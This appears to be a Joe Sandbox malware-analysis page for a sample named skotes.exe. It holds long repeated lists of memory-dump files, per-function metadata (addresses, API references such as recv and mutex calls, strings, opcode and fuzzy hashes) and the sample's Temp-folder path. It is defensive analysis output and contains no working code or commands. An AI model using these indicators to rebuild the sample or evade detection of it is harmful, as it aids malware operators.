Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: _xtime_get$Xtime_diff_to_millis2
String ID: =L-t
API String ID: 2858396081-768041998
Opcode ID: 202356f7f2932968ad54a1fb8d4f41d0a3e34b337b6b5dcdc4edec2365917657
Instruction ID: 701754fa45ebf806c5e739fcba709c33883d6461e64df1bb4226fe82749c406f
Opcode Fuzzy Hash: 202356f7f2932968ad54a1fb8d4f41d0a3e34b337b6b5dcdc4edec2365917657
Instruction Fuzzy Hash: 90519171A00506CFDF22DF24E5D596977F4EF04710B36845AD806AB295D738FD41CBA4

Function 00782EC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00782F5F
__Mtx_unlock.LIBCPMT ref: 00782FCC
__Cnd_broadcast.LIBCPMT ref: 00782FE3

Strings

=L-t, xrefs: 00782ED7, 00783203

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID: =L-t
API String ID: 32384418-768041998
Opcode ID: 4315853bad21f5e52b90395bc57bc4cb44e4b159ff3d22a5d239231036dd55fe
Instruction ID: 93a2b0b2a8a7d933bc491036c43895998d7bbcb3f7d3587f4cfaaab029a38148
Opcode Fuzzy Hash: 4315853bad21f5e52b90395bc57bc4cb44e4b159ff3d22a5d239231036dd55fe
Instruction Fuzzy Hash: 4A41E1B0A00605DFDF21EF64D948B5AB7F8FF14320F00452AE816D7281EB39EA05CB81

Function 00783AC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

__Mtx_destroy_in_situ.LIBCPMT ref: 00783B93
__Cnd_destroy_in_situ.LIBCPMT ref: 00783B99
__Mtx_destroy_in_situ.LIBCPMT ref: 00783BA2

Strings

=L-t, xrefs: 00783AD5

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
String ID: =L-t
API String ID: 3308344742-768041998
Opcode ID: 01ffe13ed0e62874cf4e9805f8ca41f9b1385ce720a3d97efe354b6b523a7177
Instruction ID: 2e67554e0460b6d235dc83ce1fdf07c2de3620849be93fd8ac8b69c43ad3fded
Opcode Fuzzy Hash: 01ffe13ed0e62874cf4e9805f8ca41f9b1385ce720a3d97efe354b6b523a7177
Instruction Fuzzy Hash: AC31B2B1640A008FDB249F2CC889B5ABBE5EF44720F04465DE95ACB791DB3CED01CB90

Function 0078E0C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 0078E10B
recv.WS2_32(?,?,00000008,00000000), ref: 0078E140

Strings

=L-t, xrefs: 0078E0D4

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: recv
String ID: =L-t
API String ID: 1507349165-768041998
Opcode ID: f53654dea121b5ad60775eaf4c55f909a46aeb8c8f1433e8d4bd22f2ea28304c
Instruction ID: da2d623dc3b9107c29c5ee498d765ebfa4f3272a77fff2d969a689add0c57592
Opcode Fuzzy Hash: f53654dea121b5ad60775eaf4c55f909a46aeb8c8f1433e8d4bd22f2ea28304c
Instruction Fuzzy Hash: 1231C771A402889BDB20DB6CDC85FAB77BCEB0C724F044625F514E72D1DB78A8458BA4

Function 007BF1BF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 007BF232
__freea.LIBCMT ref: 007BF298

Strings

=L-t, xrefs: 007BF1C7
Z{,m{, xrefs: 007BF1D2

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: =L-t$Z{,m{
API String ID: 1635606685-3218568333
Opcode ID: 59ec5e52643598cc00c1ea05295ebc542ba8de80aa9cccea6fbb3d39d6ef0f02
Instruction ID: 2e0a48a17be6d5cdf73d40fdc8a10fd909ef82df454b38b61d845a2abaad2862
Opcode Fuzzy Hash: 59ec5e52643598cc00c1ea05295ebc542ba8de80aa9cccea6fbb3d39d6ef0f02
Instruction Fuzzy Hash: 8531907590021AABDB21AF65DC45FEF7BA9FF44B10F054128FD14AB151DB388D51C7A0

Function 007B182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 007B18A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 007B18EB

Strings

pContext, xrefs: 007B189C

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: a324c1149ac5a36692d32f95a2fb29f216d9904d04c3bc731c9f1f5552619d08
Instruction ID: 9a1feb140c7cda0bcde6e6400c97c70f09f34c141446306c7af535c9c227bf2c
Opcode Fuzzy Hash: a324c1149ac5a36692d32f95a2fb29f216d9904d04c3bc731c9f1f5552619d08
Instruction Fuzzy Hash: E021F431B00615DBCB15AB68D8A9BFDB3B9BF94334BC4412AE401872D1CFACAC51CAD0

Function 007BDFE3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

6{, xrefs: 007BE034
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 007BDFE8

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
